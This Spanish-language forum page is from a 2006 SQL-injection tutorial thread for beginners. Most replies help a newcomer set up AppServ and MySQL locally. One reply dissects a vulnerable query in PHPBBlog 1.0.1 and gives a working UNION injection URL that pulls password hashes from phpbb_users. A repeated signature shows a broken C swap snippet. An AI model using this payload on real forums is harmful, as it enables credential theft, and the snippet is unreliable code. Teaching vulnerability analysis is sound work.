elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  SQL Injection para principiantes, ejemplos en aplicaciones reales.
0 Usuarios y 1 Visitante están viendo este tema.
Encuesta
Pregunta: Valora el artículo :)
Excelente - 70 (64.2%)
Bueno - 25 (22.9%)
Pasable - 7 (6.4%)
Malo - 0 (0%)
Pésimo - 7 (6.4%)
Total de votos: 100

Páginas: 1 [2] 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: SQL Injection para principiantes, ejemplos en aplicaciones reales.  (Leído 87,127 veces)
Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #10 en: 3 Octubre 2006, 03:34 am »

el nombre de  usuario y contraseña de la segunda imagen son el mismo nombre de  usuario y contraseña que se pone al instalar el appServ?
En data Base Host es el que esta? osea dede donde se accede al appServ?
Data Base Name pongo la nueva base de datos que voy a crear? porfavor esa parte no le entiendo muy bien
Citar
Servidor web donde alojar PHP y poder ejecutarlo con MySQL. (Puedes crearte una cuenta en un hosting gratuito o montarte tu propio servidor web)
Donde consigo uno ,alguien puede ayudarme?
En línea

s0cratex

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #11 en: 3 Octubre 2006, 04:56 am »

Aquí otro ejemplo...

Script: PHPBBlog 1.0.1
Descripción: Modulo para los foros PHPbb

************************************************
* http://mods.phpbbfrench.com/phpBBlog_FR_v1.0.1.zip 
************************************************

Archivo:
blog.php

El problema
Línea 34: Se crea un switch para la variable "perform"
Código:
switch($perform)

Línea 80: Si "perform" es igual a "edit"...
Código:
case 'edit':

Línea 92: La variable "id" es recibida por el script...
Código:
$id = (isset($HTTP_POST_VARS['id'])) ? $HTTP_POST_VARS['id'] : $HTTP_GET_VARS['id'];

Linea 94: Se ejecuta la siguiente sentencia SQL...
Código:
$sql = "SELECT text FROM " . BLOG_TABLE . " WHERE id = $id LIMIT 1";

Pero la variable "id" nunca es comprobada por lo que la aplicacion se considera vulnerable a SQL Injection...

Exploit:
http://localhost/phpBB2/blog.php?perform=edit&id=1%20union%20select%20user_password%20from%20phpbb_users/*

Ni me molesto en publicar este exploit porque para poder ejecutarlo tengo que ser administrador del blog. Claro sirve para ver el username y password de el primer usuario del foro, quien suele ser el Administrador/God...jeje en fin el objetivo era dar un ejemplo más...bye





« Última modificación: 3 Octubre 2006, 05:05 am por s0cratex » En línea

------------------------------------
.:[| s0cratex security crazy |]:.
------------------------------------
Ertai
Colaborador
***
Desconectado Desconectado

Mensajes: 2.025


Ralph Wiggum


Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #12 en: 3 Octubre 2006, 15:37 pm »

el nombre de  usuario y contraseña de la segunda imagen son el mismo nombre de  usuario y contraseña que se pone al instalar el appServ?
En data Base Host es el que esta? osea dede donde se accede al appServ?
Data Base Name pongo la nueva base de datos que voy a crear? porfavor esa parte no le entiendo muy bien
Citar
Servidor web donde alojar PHP y poder ejecutarlo con MySQL. (Puedes crearte una cuenta en un hosting gratuito o montarte tu propio servidor web)
Donde consigo uno ,alguien puede ayudarme?

Si te has instalado el Appserv y no has tocado nada, los datos son los siguientes:

Host: localhost
Usuario: root
Password: (vacio)
Database: elnombrekelepongascuandolacreas

Y hosting no te hace falta entonces...

Saludos! Fijate que puedes modificar el archivo en vez de seguir los pasos del instalador... Lee un poco más abajo!  ;)

Saludos!
En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #13 en: 3 Octubre 2006, 16:32 pm »

Citar
Si te has instalado el Appserv y no has tocado nada, los datos son los siguientes:

Host: localhost
Usuario: root
Password: (vacio)
Database: elnombrekelepongascuandolacreas
el password del mio tambien es root, pongo ese?
Citar
Y hosting no te hace falta entonces...
pero en el tutorial dice q debo tener alguna cuenta para ospedar los php
En línea

Ertai
Colaborador
***
Desconectado Desconectado

Mensajes: 2.025


Ralph Wiggum


Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #14 en: 3 Octubre 2006, 19:09 pm »

Si cambiaste los datos, ponle los que pusiste.

La cuenta de hosting es solo por si no tienes un servidor local.
En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #15 en: 3 Octubre 2006, 22:36 pm »

Citar
La cuenta de hosting es solo por si no tienes un servidor local.
como se si tengo un servidor local? yo lo quiero hacer desde mi casa ,desde mi pc, no esta en red ni nada
En línea

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #16 en: 3 Octubre 2006, 22:41 pm »

Citar
como se si tengo un servidor local? yo lo quiero hacer desde mi casa ,desde mi pc, no esta en red ni nada

tu sabras si tienes instalado un servidor web. no hace falta que este en red, si instalas un servidor web en tu ordenador solo tienes que ir a http://localhost y ahi tienes tu pagina o lo que quieras poner.
En línea

Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #17 en: 4 Octubre 2006, 03:26 am »

el http:\localhost si funciona en mi maquino ,creo q se habilito al instalar el appServ, entonces ahi tambien puedo ospedar mis php?
pero eso solo lo uso para hacer bases de datos
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #18 en: 4 Octubre 2006, 03:41 am »

si, de hecho con appserv ya tienes mysql.

Saludos!!
En línea

Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: SQL Injection para principiantes, ejemplos en aplicaciones reales.
« Respuesta #19 en: 6 Octubre 2006, 20:54 pm »

hola ,soy novato en esto ,pero tengo muchas ganas de aprender y espero me tengan un poco de paciencia
como abro el archivo installl.php del zip que me baje ,cuando hago doble click me habre el dreamwaver ,que programa necesito? dicen q lo abra desde el navegador ,cual navegador?
Citar
Ejecutar estas dos sentencias SQL desde un interprete para MySQL o desde el phpMyAdmin
que interprete para mySQL ?
Que programas necesito ,porfavor indiquenme
es q me confunde tantos programas q existe
En línea

Páginas: 1 [2] 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ejemplos scripts PHP para Banear IP y Rangos de IP's
PHP
el-brujo 0 9,553 Último mensaje 1 Junio 2012, 20:58 pm
por el-brujo
Ataques XSS avanzados a aplicaciones webs: 3 Ejemplos
Nivel Web
MichBukana 2 3,396 Último mensaje 27 Octubre 2013, 20:18 pm
por Shout
Tutoriales ejemplos para trabajar con arrays ?
.NET (C#, VB.NET, ASP)
luis456 2 1,784 Último mensaje 20 Diciembre 2013, 16:18 pm
por luis456
Soluciones científicas reales para no extinguirnos
Foro Libre
Eleкtro 5 1,459 Último mensaje 15 Enero 2020, 00:58 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines